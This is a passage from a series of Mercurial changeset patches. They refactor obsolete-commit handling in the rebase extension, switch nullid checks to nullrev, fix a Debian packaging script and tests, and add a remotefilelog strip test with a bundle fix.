b'rebaseskipobsolete'): return obsoleteset = {r for r in self.state if self.repo[r].obsolete()} ( - self.obsoletenotrebased, - self.obsoletewithoutsuccessorindestination, - ) = _computeobsoletenotrebased(self.repo, obsoleteset, self.destmap) - skippedset = set(self.obsoletenotrebased) - skippedset.update(self.obsoletewithoutsuccessorindestination) + self.obsolete_with_successor_in_destination, + self.obsolete_with_successor_in_rebase_set, + ) = _compute_obsolete_sets(self.repo, obsoleteset, self.destmap) + skippedset = set(self.obsolete_with_successor_in_destination) + skippedset.update(self.obsolete_with_successor_in_rebase_set) _checkobsrebase(self.repo, self.ui, obsoleteset, skippedset) def _prepareabortorcontinue( @@ -368,7 +368,7 @@ self.resume = True try: self.restorestatus() - # Calculate self.obsoletenotrebased + # Calculate self.obsolete_* sets self._handleskippingobsolete() self.collapsemsg = restorecollapsemsg(self.repo, isabort) except error.RepoLookupError: @@ -436,7 +436,7 @@ self.prepared = True - # Calculate self.obsoletenotrebased + # Calculate self.obsolete_* sets self._handleskippingobsolete() def _assignworkingcopy(self): @@ -501,8 +501,8 @@ if not allowdivergence: sortedrevs -= self.repo.revs( b'descendants(%ld) and not %ld', - self.obsoletewithoutsuccessorindestination, - self.obsoletewithoutsuccessorindestination, + self.obsolete_with_successor_in_rebase_set, + self.obsolete_with_successor_in_rebase_set, ) for rev in sortedrevs: self._rebasenode(tr, rev, allowdivergence, progress) @@ -575,7 +575,7 @@ ui.status(_(b'already rebased %s\n') % desc) elif ( not allowdivergence - and rev in self.obsoletewithoutsuccessorindestination + and rev in self.obsolete_with_successor_in_rebase_set ): msg = ( _( @@ -586,8 +586,8 @@ ) repo.ui.status(msg) self.skipped.add(rev) - elif rev in self.obsoletenotrebased: - succ = self.obsoletenotrebased[rev] + elif rev in self.obsolete_with_successor_in_destination: + succ = 
self.obsolete_with_successor_in_destination[rev] if succ is None: msg = _(b'note: not rebasing %s, it has no successor\n') % desc else: @@ -613,7 +613,7 @@ self.destmap, self.state, self.skipped, - self.obsoletenotrebased, + self.obsolete_with_successor_in_destination, ) if self.resume and self.wctx.p1().rev() == p1: repo.ui.debug(b'resuming interrupted rebase\n') @@ -725,7 +725,7 @@ self.destmap, self.state, self.skipped, - self.obsoletenotrebased, + self.obsolete_with_successor_in_destination, ) editopt = opts.get(b'edit') editform = b'rebase.collapse' @@ -2179,17 +2179,17 @@ return ret -def _computeobsoletenotrebased(repo, rebaseobsrevs, destmap): - """Return (obsoletenotrebased, obsoletewithoutsuccessorindestination). +def _compute_obsolete_sets(repo, rebaseobsrevs, destmap): + """Figure out what to do about about obsolete revisions - `obsoletenotrebased` is a mapping mapping obsolete => successor for all + `obsolete_with_successor_in_destination` is a mapping mapping obsolete => successor for all obsolete nodes to be rebased given in `rebaseobsrevs`. - `obsoletewithoutsuccessorindestination` is a set with obsolete revisions - without a successor in destination. + `obsolete_with_successor_in_rebase_set` is a set with obsolete revisions, + without a successor in destination, that would cause divergence. 
""" - obsoletenotrebased = {} - obsoletewithoutsuccessorindestination = set() + obsolete_with_successor_in_destination = {} + obsolete_with_successor_in_rebase_set = set() assert repo.filtername is None cl = repo.changelog @@ -2205,21 +2205,24 @@ succrevs.discard(None) if not successors or succrevs.issubset(extinctrevs): # no successor, or all successors are extinct - obsoletenotrebased[srcrev] = None + obsolete_with_successor_in_destination[srcrev] = None else: dstrev = destmap[srcrev] for succrev in succrevs: if cl.isancestorrev(succrev, dstrev): - obsoletenotrebased[srcrev] = succrev + obsolete_with_successor_in_destination[srcrev] = succrev break else: # If 'srcrev' has a successor in rebase set but none in # destination (which would be catched above), we shall skip it # and its descendants to avoid divergence. if srcrev in extinctrevs or any(s in destmap for s in succrevs): - obsoletewithoutsuccessorindestination.add(srcrev) + obsolete_with_successor_in_rebase_set.add(srcrev) - return obsoletenotrebased, obsoletewithoutsuccessorindestination + return ( + obsolete_with_successor_in_destination, + obsolete_with_successor_in_rebase_set, + ) def abortrebase(ui, repo): # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616219579 25200 # Fri Mar 19 22:52:59 2021 -0700 # Node ID 535de0e34a797f9b188ff5c5d652f96a70d65c2c # Parent 47c251a145255b30061971a4c241567b78e83158 rebase: filter out descendants of divergence-causing commits earlier `hg rebase` treats obsolete commits differently depending what has happened to the commit: 1) Obsolete commit without non-obsolete successors: Skipped, and a note is printed ("it has no successor"). 2) Obsolete commit with a successor in the destination (ancestor of it): Skipped, and a note is printed ("already in destination"). 
3) Obsolete commit with a successor in the rebase set: The commit and its descendants are skipped, and a note is printed ("not rebasing <commit> and its descendants as this would cause divergence"), unless `allowdivergence` config set. 4) Obsolete commit with a successor elsewhere: Error ("this rebase will cause divergences"), unless `allowdivergence` config set. Before this patch, we did all those checks up front, except for (3), which was checked later. The later check consisted of two parts: 1) filtering out of descendants, and 2) conditionally printing message if the `allowdivergence` config was not set. This patch makes it so we do the filtering early. A consequence of filtering out divergence-causing commits earlier is that we rebase commits in slightly different order, which has some impact on tests. Differential Revision: https://phab.mercurial-scm.org/D10249 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -361,6 +361,19 @@ skippedset = set(self.obsolete_with_successor_in_destination) skippedset.update(self.obsolete_with_successor_in_rebase_set) _checkobsrebase(self.repo, self.ui, obsoleteset, skippedset) + allowdivergence = self.ui.configbool( + b'experimental', b'evolution.allowdivergence' + ) + if allowdivergence: + self.obsolete_with_successor_in_rebase_set = set() + else: + for rev in self.repo.revs( + b'descendants(%ld) and not %ld', + self.obsolete_with_successor_in_rebase_set, + self.obsolete_with_successor_in_rebase_set, + ): + self.state.pop(rev, None) + self.destmap.pop(rev, None) def _prepareabortorcontinue( self, isabort, backup=True, suppwarns=False, dryrun=False, confirm=False @@ -493,19 +506,10 @@ def progress(ctx): p.increment(item=(b"%d:%s" % (ctx.rev(), ctx))) - allowdivergence = self.ui.configbool( - b'experimental', b'evolution.allowdivergence' - ) for subset in sortsource(self.destmap): sortedrevs = self.repo.revs(b'sort(%ld, -topo)', subset) - if not allowdivergence: - sortedrevs -= 
self.repo.revs( - b'descendants(%ld) and not %ld', - self.obsolete_with_successor_in_rebase_set, - self.obsolete_with_successor_in_rebase_set, - ) for rev in sortedrevs: - self._rebasenode(tr, rev, allowdivergence, progress) + self._rebasenode(tr, rev, progress) p.complete() ui.note(_(b'rebase merging completed\n')) @@ -567,16 +571,13 @@ return newnode - def _rebasenode(self, tr, rev, allowdivergence, progressfn): + def _rebasenode(self, tr, rev, progressfn): repo, ui, opts = self.repo, self.ui, self.opts ctx = repo[rev] desc = _ctxdesc(ctx) if self.state[rev] == rev: ui.status(_(b'already rebased %s\n') % desc) - elif ( - not allowdivergence - and rev in self.obsolete_with_successor_in_rebase_set - ): + elif rev in self.obsolete_with_successor_in_rebase_set: msg = ( _( b'note: not rebasing %s and its descendants as ' diff --git a/tests/test-rebase-obsolete3.t b/tests/test-rebase-obsolete3.t --- a/tests/test-rebase-obsolete3.t +++ b/tests/test-rebase-obsolete3.t @@ -72,9 +72,9 @@ $ hg rebase -b 'e' -d 'x' rebasing 1:488e1b7e7341 b "b" rebasing 3:a82ac2b38757 c "c" + note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence rebasing 5:027ad6c5830d d' "d'" rebasing 6:d60ebfa0f1cb e "e" - note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence $ hg log -G -r 'a':: o 11:eb6d63fc4ed5 e | @@ -207,16 +207,16 @@ $ hg rebase -b 'f' -d 'x' rebasing 1:488e1b7e7341 b "b" rebasing 3:a82ac2b38757 c "c" - rebasing 5:63324dc512ea e' "e'" - rebasing 7:3ffec603ab53 f "f" rebasing 4:76be324c128b d "d" note: not rebasing 6:e36fae928aec e "e" and its descendants as this would cause divergence + rebasing 5:63324dc512ea e' "e'" + rebasing 7:3ffec603ab53 f "f" $ hg log -G -r 'a': - o 13:a1707a5b7c2c d + o 13:ef6251596616 f | - | o 12:ef6251596616 f - | | - | o 11:b6f172e64af9 e' + o 12:b6f172e64af9 e' + | + | o 11:a1707a5b7c2c d |/ o 10:d008e6b4d3fd c | @@ -224,13 +224,13 @@ | | * 8:2876ce66c6eb g | | - | | x 
7:3ffec603ab53 f (rewritten using rebase as 12:ef6251596616) + | | x 7:3ffec603ab53 f (rewritten using rebase as 13:ef6251596616) | | | | x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) | | | - | | x 5:63324dc512ea e' (rewritten using rebase as 11:b6f172e64af9) + | | x 5:63324dc512ea e' (rewritten using rebase as 12:b6f172e64af9) | | | - | x | 4:76be324c128b d (rewritten using rebase as 13:a1707a5b7c2c) + | x | 4:76be324c128b d (rewritten using rebase as 11:a1707a5b7c2c) | |/ | x 3:a82ac2b38757 c (rewritten using rebase as 10:d008e6b4d3fd) | | # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616536171 25200 # Tue Mar 23 14:49:31 2021 -0700 # Node ID c2438f2f635c4b0b486a76fdbfecbfc2c22528b5 # Parent 535de0e34a797f9b188ff5c5d652f96a70d65c2c rebase: set `prepared = True` at very end of `_preparenewrebase()` Once we've set `rebaseruntime.prepared = True`, `rebaseruntime.repo` starts returning the unfiltered repo. That will make my next patch break, because that patch moves the call to `rewriteutil.precheck()` after the call to `_handleskippingobsolete()`, which current happens after `prepared = True`. We therefore need to prepare by moving `prepared = True` a bit later, after `_handleskippingobsolete()`. I don't think that matters for that call. 
Differential Revision: https://phab.mercurial-scm.org/D10257 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -447,11 +447,11 @@ if dest.closesbranch() and not self.keepbranchesf: self.ui.status(_(b'reopening closed branch head %s\n') % dest) - self.prepared = True - # Calculate self.obsolete_* sets self._handleskippingobsolete() + self.prepared = True + def _assignworkingcopy(self): if self.inmemory: from mercurial.context import overlayworkingctx @@ -2192,7 +2192,6 @@ obsolete_with_successor_in_destination = {} obsolete_with_successor_in_rebase_set = set() - assert repo.filtername is None cl = repo.changelog get_rev = cl.index.get_rev extinctrevs = set(repo.revs(b'extinct()')) # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616534140 25200 # Tue Mar 23 14:15:40 2021 -0700 # Node ID 80cac9936324965f0f7116dddb06ce7470ec2411 # Parent c2438f2f635c4b0b486a76fdbfecbfc2c22528b5 reabase: call rewriteutil.precheck() a bit later We now filter out descendants of divergence-causing commits in `_handleskippingobsolete()`. The filtered-out commits are removed from the rebase set (`destmap` and `state`). We should therefore call `rewriteutil.precheck()` after `_handleskippingobsolete()`. This patch does that. It hasn't mattered so far because `rewriteutil.precheck()` doesn't yet check for divergence, but it will soon. This affects one test where we now fail because the user is trying to rebase an ancestor instead of failing because they tried to rebase a public commit. We have several similar tests just after, where we still fail because of the phase, so that seems fine. The difference in behavior also seems fine to me. 
Differential Revision: https://phab.mercurial-scm.org/D10258 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -413,15 +413,6 @@ if not destmap: return _nothingtorebase() - rebaseset = destmap.keys() - if not self.keepf: - try: - rewriteutil.precheck(self.repo, rebaseset, action=b'rebase') - except error.Abort as e: - if e.hint is None: - e.hint = _(b'use --keep to keep original changesets') - raise e - result = buildstate(self.repo, destmap, self.collapsef) if not result: @@ -450,6 +441,15 @@ # Calculate self.obsolete_* sets self._handleskippingobsolete() + rebaseset = destmap.keys() + if not self.keepf: + try: + rewriteutil.precheck(self.repo, rebaseset, action=b'rebase') + except error.Abort as e: + if e.hint is None: + e.hint = _(b'use --keep to keep original changesets') + raise e + self.prepared = True def _assignworkingcopy(self): diff --git a/tests/test-rebase-scenario-global.t b/tests/test-rebase-scenario-global.t --- a/tests/test-rebase-scenario-global.t +++ b/tests/test-rebase-scenario-global.t @@ -325,9 +325,8 @@ $ hg pull --config phases.publish=True -q -r 6 . # update phase of 6 $ hg rebase -d 0 -b 6 - abort: cannot rebase public changesets - (see 'hg help phases' for details) - [10] + nothing to rebase + [1] $ hg rebase -d 5 -b 6 abort: cannot rebase public changesets (see 'hg help phases' for details) # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616564907 25200 # Tue Mar 23 22:48:27 2021 -0700 # Node ID 27ba8acd568464e85ffacdb33357d9583bf45cae # Parent 80cac9936324965f0f7116dddb06ce7470ec2411 rebase: don't call rewriteutil.precheck() with to-be-skipped commits It's clearly incorrect to call `rewriteutil.precheck()` for commits that we're not about to rewrite. We haven't noticed yet because the function doesn't check for divergence, but I'm about to teach it to do that. 
Differential Revision: https://phab.mercurial-scm.org/D10259 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -441,8 +441,10 @@ # Calculate self.obsolete_* sets self._handleskippingobsolete() - rebaseset = destmap.keys() if not self.keepf: + rebaseset = set(destmap.keys()) + rebaseset -= set(self.obsolete_with_successor_in_destination) + rebaseset -= self.obsolete_with_successor_in_rebase_set try: rewriteutil.precheck(self.repo, rebaseset, action=b'rebase') except error.Abort as e: # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1613107385 28800 # Thu Feb 11 21:23:05 2021 -0800 # Node ID d083c12032c652d71536c86bbcf4e9e9ec13f5ed # Parent 27ba8acd568464e85ffacdb33357d9583bf45cae tests: update divergence test for `hg fix` to actually result in divergence We have a test that checks that `hg fix` errors out if it might cause divergence. However, the test simply prunes the commit it then tries to fix, so fixing it wouldn't actually cause divergence. That works because the implementation is simple enough that it doesn't notice the difference. I'm about to make the implementation smarter, so let's fix the test first. 
Differential Revision: https://phab.mercurial-scm.org/D10267 diff --git a/tests/test-fix.t b/tests/test-fix.t --- a/tests/test-fix.t +++ b/tests/test-fix.t @@ -1106,14 +1106,13 @@ $ printf "foo\n" > foo.changed $ hg commit -Aqm "foo" - $ hg debugobsolete `hg parents --template '{node}'` - 1 new obsolescence markers - obsoleted 1 changesets + $ hg ci --amend -m rewritten $ hg --hidden fix -r 0 abort: fixing obsolete revision could cause divergence [255] $ hg --hidden fix -r 0 --config experimental.evolution.allowdivergence=true + 2 new content-divergent changesets $ hg cat -r tip foo.changed FOO # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1616961219 -7200 # Sun Mar 28 21:53:39 2021 +0200 # Node ID eb2a6f66c463b5a3081cf8802ebd7d6888feb54a # Parent d083c12032c652d71536c86bbcf4e9e9ec13f5ed fix: merge imports Differential Revision: https://phab.mercurial-scm.org/D10277 diff --git a/hgext/fix.py b/hgext/fix.py --- a/hgext/fix.py +++ b/hgext/fix.py @@ -131,8 +131,10 @@ import subprocess from mercurial.i18n import _ -from mercurial.node import nullrev -from mercurial.node import wdirrev +from mercurial.node import ( + nullrev, + wdirrev, +) from mercurial.utils import procutil # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1616953837 -7200 # Sun Mar 28 19:50:37 2021 +0200 # Node ID 6dea77e195d2060ed7fd1839c7dec979782a0b3d # Parent eb2a6f66c463b5a3081cf8802ebd7d6888feb54a test: enforce master to be the default branch in test Newer git issue a message about this. 
Differential Revision: https://phab.mercurial-scm.org/D10281 diff --git a/tests/test-git-interop.t b/tests/test-git-interop.t --- a/tests/test-git-interop.t +++ b/tests/test-git-interop.t @@ -14,6 +14,7 @@ > git commit "$@" >/dev/null 2>/dev/null || echo "git commit error" > count=`expr $count + 1` > } + $ git config --global init.defaultBranch master $ hg version -v --config extensions.git= | grep '^[E ]' # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1616974554 -7200 # Mon Mar 29 01:35:54 2021 +0200 # Node ID e7b4607d52e3cc850355b84a66f111766eb32ac1 # Parent 6dea77e195d2060ed7fd1839c7dec979782a0b3d setdiscovery: simplify by using tiprev directly tip() uses tiprev() and reads the node from it, so drop a layer of indirection. Differential Revision: https://phab.mercurial-scm.org/D10289 diff --git a/mercurial/setdiscovery.py b/mercurial/setdiscovery.py --- a/mercurial/setdiscovery.py +++ b/mercurial/setdiscovery.py @@ -390,7 +390,7 @@ if audit is not None: audit[b'total-roundtrips'] = 1 - if cl.tip() == nullid: + if cl.tiprev() == nullrev: if srvheadhashes != [nullid]: return [nullid], True, srvheadhashes return [nullid], False, [] # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1617064392 -7200 # Tue Mar 30 02:33:12 2021 +0200 # Node ID ad878e3f282b2623840e66226b29d9fbebd3cfbc # Parent e7b4607d52e3cc850355b84a66f111766eb32ac1 refactor: prefer lookup by revision, even for null While the nullid lookup is a special case, it is still more complicated. The common pattern is to lookup via nullrev so be consistent here. 
Differential Revision: https://phab.mercurial-scm.org/D10280 diff --git a/mercurial/cmdutil.py b/mercurial/cmdutil.py --- a/mercurial/cmdutil.py +++ b/mercurial/cmdutil.py @@ -16,6 +16,7 @@ from .node import ( hex, nullid, + nullrev, short, ) from .pycompat import ( @@ -1936,12 +1937,12 @@ ui.debug(b'message:\n%s\n' % (message or b'')) if len(parents) == 1: - parents.append(repo[nullid]) + parents.append(repo[nullrev]) if opts.get(b'exact'): if not nodeid or not p1: raise error.InputError(_(b'not a Mercurial patch')) p1 = repo[p1] - p2 = repo[p2 or nullid] + p2 = repo[p2 or nullrev] elif p2: try: p1 = repo[p1] @@ -1951,10 +1952,10 @@ # first parent. if p1 != parents[0]: p1 = parents[0] - p2 = repo[nullid] + p2 = repo[nullrev] except error.RepoError: p1, p2 = parents - if p2.node() == nullid: + if p2.rev() == nullrev: ui.warn( _( b"warning: import the patch as a normal revision\n" diff --git a/mercurial/context.py b/mercurial/context.py --- a/mercurial/context.py +++ b/mercurial/context.py @@ -3000,7 +3000,7 @@ parents = [repo[p] for p in parents if p is not None] parents = parents[:] while len(parents) < 2: - parents.append(repo[nullid]) + parents.append(repo[nullrev]) p1, p2 = self._parents = parents # sanity check to ensure that the reused manifest parents are # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1617064350 -7200 # Tue Mar 30 02:32:30 2021 +0200 # Node ID 728d89f6f9b1d180749d7678342c2a0eb8a72f42 # Parent ad878e3f282b2623840e66226b29d9fbebd3cfbc refactor: prefer checks against nullrev over nullid A common pattern is using a changeset context and obtaining the node to compare against nullid. Change this to obtain the nullrev instead. In the future, the nullid becomes a property of the repository and is no longer a global constant, so using nullrev is much easier to reason about. Python function call overhead makes the difference moot, but future changes will result in more dictionary lookups otherwise, so prefer the simpler pattern. 
Differential Revision: https://phab.mercurial-scm.org/D10290 diff --git a/hgext/extdiff.py b/hgext/extdiff.py --- a/hgext/extdiff.py +++ b/hgext/extdiff.py @@ -91,7 +91,7 @@ from mercurial.i18n import _ from mercurial.node import ( - nullid, + nullrev, short, ) from mercurial import ( @@ -565,18 +565,18 @@ repo, [from_rev] + [to_rev], b'nowarn' ) ctx1a = scmutil.revsingle(repo, from_rev, None) - ctx1b = repo[nullid] + ctx1b = repo[nullrev] ctx2 = scmutil.revsingle(repo, to_rev, None) else: ctx1a, ctx2 = scmutil.revpair(repo, revs) if not revs: ctx1b = repo[None].p2() else: - ctx1b = repo[nullid] + ctx1b = repo[nullrev] # Disable 3-way merge if there is only one parent if do3way: - if ctx1b.node() == nullid: + if ctx1b.rev() == nullrev: do3way = False matcher = scmutil.match(ctx2, pats, opts) diff --git a/hgext/split.py b/hgext/split.py --- a/hgext/split.py +++ b/hgext/split.py @@ -12,7 +12,7 @@ from mercurial.i18n import _ from mercurial.node import ( - nullid, + nullrev, short, ) @@ -80,12 +80,12 @@ raise error.InputError(_(b'cannot split multiple revisions')) rev = revs.first() - ctx = repo[rev] - # Handle nullid specially here (instead of leaving for precheck() + # Handle nullrev specially here (instead of leaving for precheck() # below) so we get a nicer message and error code. - if rev is None or ctx.node() == nullid: + if rev is None or rev == nullrev: ui.status(_(b'nothing to split\n')) return 1 + ctx = repo[rev] if ctx.node() is None: raise error.InputError(_(b'cannot split working directory')) diff --git a/mercurial/context.py b/mercurial/context.py --- a/mercurial/context.py +++ b/mercurial/context.py @@ -2885,7 +2885,7 @@ # "1 < len(self._parents)" can't be used for checking # existence of the 2nd parent, because "memctx._parents" is # explicitly initialized by the list, of which length is 2. 
- if p2.node() != nullid: + if p2.rev() != nullrev: man2 = p2.manifest() managing = lambda f: f in man1 or f in man2 else: @@ -2903,7 +2903,7 @@ return scmutil.status(modified, added, removed, [], [], [], []) def parents(self): - if self._parents[1].node() == nullid: + if self._parents[1].rev() == nullrev: return [self._parents[0]] return self._parents @@ -3052,7 +3052,7 @@ # "1 < len(self._parents)" can't be used for checking # existence of the 2nd parent, because "metadataonlyctx._parents" is # explicitly initialized by the list, of which length is 2. - if p2.node() != nullid: + if p2.rev() != nullrev: man2 = p2.manifest() managing = lambda f: f in man1 or f in man2 else: diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -149,7 +149,7 @@ # optimization, since the ctx.files() for a merge commit is not correct for # this comparison. forwardmissingmatch = match - if b.p1() == a and b.p2().node() == nullid: + if b.p1() == a and b.p2().rev() == nullrev: filesmatcher = matchmod.exact(b.files()) forwardmissingmatch = matchmod.intersectmatchers(match, filesmatcher) if repo.ui.configbool(b'devel', b'copy-tracing.trace-all-files'): diff --git a/mercurial/logcmdutil.py b/mercurial/logcmdutil.py --- a/mercurial/logcmdutil.py +++ b/mercurial/logcmdutil.py @@ -14,6 +14,7 @@ from .i18n import _ from .node import ( nullid, + nullrev, wdirid, wdirrev, ) @@ -82,7 +83,7 @@ If diff.merge is enabled, an overlayworkingctx of the auto-merged parents will be returned. """ repo = ctx.repo() - if repo.ui.configbool(b"diff", b"merge") and ctx.p2().node() != nullid: + if repo.ui.configbool(b"diff", b"merge") and ctx.p2().rev() != nullrev: # avoid cycle context -> subrepo -> cmdutil -> logcmdutil from . import context diff --git a/mercurial/mergestate.py b/mercurial/mergestate.py --- a/mercurial/mergestate.py +++ b/mercurial/mergestate.py @@ -11,6 +11,7 @@ hex, nullhex, nullid, + nullrev, ) from . 
import ( error, @@ -341,7 +342,7 @@ flo = fco.flags() fla = fca.flags() if b'x' in flags + flo + fla and b'l' not in flags + flo + fla: - if fca.node() == nullid and flags != flo: + if fca.rev() == nullrev and flags != flo: if preresolve: self._repo.ui.warn( _( diff --git a/mercurial/shelve.py b/mercurial/shelve.py --- a/mercurial/shelve.py +++ b/mercurial/shelve.py @@ -534,7 +534,7 @@ parent = parents[0] origbranch = wctx.branch() - if parent.node() != nullid: + if parent.rev() != nullrev: desc = b"changes to: %s" % parent.description().split(b'\n', 1)[0] else: desc = b'(changes in empty repository)' diff --git a/mercurial/simplemerge.py b/mercurial/simplemerge.py --- a/mercurial/simplemerge.py +++ b/mercurial/simplemerge.py @@ -19,7 +19,7 @@ from __future__ import absolute_import from .i18n import _ -from .node import nullid +from .node import nullrev from . import ( error, mdiff, @@ -427,7 +427,7 @@ def is_not_null(ctx): if not util.safehasattr(ctx, "node"): return False - return ctx.node() != nullid + return ctx.rev() != nullrev def _mergediff(m3, name_a, name_b, name_base): # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1617144876 25200 # Tue Mar 30 15:54:36 2021 -0700 # Node ID 2fd5e0054dd9d2e36ba0b796726c701d9538294f # Parent 728d89f6f9b1d180749d7678342c2a0eb8a72f42 deb: avoid use of [[ in 'rules' file It's not supported by posix shell, and apparently my build system uses that. 
Differential Revision: https://phab.mercurial-scm.org/D10292 diff --git a/contrib/packaging/debian/rules b/contrib/packaging/debian/rules --- a/contrib/packaging/debian/rules +++ b/contrib/packaging/debian/rules @@ -96,7 +96,7 @@ cp contrib/bash_completion "$(CURDIR)"/debian/mercurial/usr/share/bash-completion/completions/hg mkdir -p "$(CURDIR)"/debian/mercurial/usr/share/zsh/vendor-completions cp contrib/zsh_completion "$(CURDIR)"/debian/mercurial/usr/share/zsh/vendor-completions/_hg - if [[ "$(DEB_HG_CHG_BY_DEFAULT)" -eq 1 ]]; then \ + if [ "$(DEB_HG_CHG_BY_DEFAULT)" -eq 1 ]; then \ mkdir -p "$(CURDIR)"/debian/mercurial/usr/lib/mercurial; \ mv "$(CURDIR)"/debian/mercurial/usr/bin/hg "$(CURDIR)"/debian/mercurial/usr/lib/mercurial/hg; \ ln -s chg "$(CURDIR)"/debian/mercurial/usr/bin/hg; \ # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1617142792 -7200 # Wed Mar 31 00:19:52 2021 +0200 # Node ID 94ea945190f300fb0e27ad1aa97ca4b7d3081630 # Parent 2fd5e0054dd9d2e36ba0b796726c701d9538294f mergestate: remove unused import Differential Revision: https://phab.mercurial-scm.org/D10291 diff --git a/mercurial/mergestate.py b/mercurial/mergestate.py --- a/mercurial/mergestate.py +++ b/mercurial/mergestate.py @@ -10,7 +10,6 @@ bin, hex, nullhex, - nullid, nullrev, ) from . import ( # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1617748713 25200 # Tue Apr 06 15:38:33 2021 -0700 # Node ID 2819df466cae70b26c0501f765aff1edfa8a90be # Parent 94ea945190f300fb0e27ad1aa97ca4b7d3081630 tests: add test-remotefilelog-strip.t to demonstrate an issue with linknodes ### Background Every time a commit is modified, remotefilelog updates the metadata for the file object to point to the new commit (I believe that this is different from non-remotefilelog hg, which leaves the linkrevs pointing to the obsolete commits; doing otherwise would involve changing data in the middle of revlogs). 
With `hg strip` (or other things that use repair.strip()), when you strip a commit that's not the tip of the revlog, there may be commits after it in revnum order that aren't descended from it and don't need to be (and shouldn't be) stripped. These are "saved" by strip in a bundle, and that bundle is reapplied after truncating the relevant revlogs. ### The problem Remotefilelog generally avoids being involved at all in strip. Currently, that includes even providing file contents to this backup bundle. This can cause the linknode to point to a changeset that is no longer in the repository. Example: ``` @ 3 df91f74b871e | | x 2 70494d7ec5ef |/ | x 1 1e423846dde0 |/ o 0 b292c1e3311f ``` Commits 1, 2, and 3 are related via obsolescence, and are description-only changes. The linknode for the file in these commits changed each time we updated the description, so it's currently df91f7. If I strip commits 1 and 3, however, the linknode *remains* df91f7, which no longer exists in the repository. Commit 70494d was "saved", stripped, and then reapplied, so it is in the repository (as revision 1 instead of 2 now), and was unobsoleted since the obsmarker was stripped as well. The linknode for the file should point to 70494d, the most recent commit that is in the repository that modified the file. Remotefilelog has some logic to handle broken linknodes, but it can be slow. We have actually disabled it internally because it's too slow for our purposes. Differential Revision: https://phab.mercurial-scm.org/D10319 diff --git a/tests/test-remotefilelog-strip.t b/tests/test-remotefilelog-strip.t new file mode 100644 --- /dev/null +++ b/tests/test-remotefilelog-strip.t @@ -0,0 +1,67 @@ +#require no-windows + + $ . "$TESTDIR/remotefilelog-library.sh" + + $ hg init master + $ cd master + $ cat >> .hg/hgrc <<EOF + > [remotefilelog] + > server=True + > EOF + $ echo x > x + $ hg commit -qAm x + + $ cd .. 
+ + $ hgcloneshallow ssh://user@dummy/master shallow -q + 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) + $ cd shallow + + $ cat >> $TESTTMP/get_file_linknode.py <<EOF + > from mercurial import node, registrar, scmutil + > cmdtable = {} + > command = registrar.command(cmdtable) + > @command(b'debug-file-linknode', [(b'r', b'rev', b'.', b'rev')], b'hg debug-file-linknode FILE') + > def debug_file_linknode(ui, repo, file, **opts): + > rflctx = scmutil.revsingle(repo.unfiltered(), opts['rev']).filectx(file) + > ui.status(b'%s\n' % node.hex(rflctx.ancestormap()[rflctx._filenode][2])) + > EOF + + $ cat >> .hg/hgrc <<EOF + > [ui] + > interactive=1 + > [extensions] + > strip= + > get_file_linknode=$TESTTMP/get_file_linknode.py + > [experimental] + > evolution=createmarkers,allowunstable + > EOF + $ echo a > a + $ hg commit -qAm msg1 + $ hg commit --amend 're:^$' -m msg2 + $ hg commit --amend 're:^$' -m msg3 + $ hg --hidden log -G -T '{rev} {node|short}' + @ 3 df91f74b871e + | + | x 2 70494d7ec5ef + |/ + | x 1 1e423846dde0 + |/ + o 0 b292c1e3311f + + $ hg debug-file-linknode -r 70494d a + df91f74b871e064c89afa1fe9e2f66afa2c125df + $ hg --hidden strip -r 1 3 + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved + saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/df91f74b871e-c94d67be-backup.hg + + $ hg --hidden log -G -T '{rev} {node|short}' + o 1 70494d7ec5ef + | + @ 0 b292c1e3311f + +FIXME: This should point to a commit that actually exists in the repo. Otherwise +remotefilelog has to search every commit in the repository looking for a valid +linkrev every time it's queried, such as during push. 
+ $ hg debug-file-linknode -r 70494d a + df91f74b871e064c89afa1fe9e2f66afa2c125df # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1617744063 25200 # Tue Apr 06 14:21:03 2021 -0700 # Node ID 47a9527731c3c2aca078f949ce0980ea462f3c66 # Parent 2819df466cae70b26c0501f765aff1edfa8a90be remotefilelog: include file contents in bundles produced during strip `hg strip` and other things that use repair.strip (such as the narrow extension's `hg tracked --removeinclude`) will "save" some commits that have a higher revision number than the oldest commit we're stripping, but aren't actually descended from any of the commits that we're stripping. It saves them in a bundle, and then reapplies them to the repo. Remotefilelog doesn't generally participate in strip, it doesn't contribute files to either the backup bundle or the "saved" bundle, and doesn't adjust linknodes when commits are stripped. This can break things like push, which rely on the linknodes. This change makes it so that remotefilelog includes files in these bundles during strip operations. During reapplication, the files are reapplied from the bundle, and the linknode is properly updated. Differential Revision: https://phab.mercurial-scm.org/D10320 diff --git a/hgext/remotefilelog/__init__.py b/hgext/remotefilelog/__init__.py --- a/hgext/remotefilelog/__init__.py +++ b/hgext/remotefilelog/__init__.py @@ -215,6 +215,8 @@ 